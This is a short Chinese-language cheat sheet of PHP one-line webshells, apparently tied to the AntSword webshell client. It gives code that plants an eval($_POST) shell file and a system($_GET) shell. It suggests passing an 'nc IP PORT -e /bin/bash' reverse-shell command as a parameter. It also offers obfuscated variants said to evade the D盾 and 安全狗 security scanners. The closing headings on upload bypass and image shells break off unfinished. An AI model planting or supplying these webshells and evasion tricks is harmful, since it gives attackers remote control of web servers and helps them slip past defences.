一句话木马汇总
GitHub
中国蚁剑项目
PHP一句话
- 在服务端生成内容为一句话木马的shell.php文件,结合php://input使用。
- <?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"];?>');?>`
复制代码
- 将“nc IP PORT -e /bin/bash”作为cmd参数的值传递给服务端,攻击机开启nc监听模式。
- <?php system($_GET["cmd"]) ?>
复制代码
静态免杀PHP一句话
- 可绕过D盾,D盾对于eval中是否包含$比较敏感。
- <?php
- function a()
- {
- return "/*asdas*/".$_POST['a'];
- }
- eval(a());
- ?>
复制代码
- 可以绕过D盾和安全狗。
- <?php
- ob_start();
- echo "/*sdjmz*/".$_GET["id"];
- eval(ob_get_contents());
- ob_flush();
- ?>
复制代码
文件上传绕过
图片马制作
cmd< |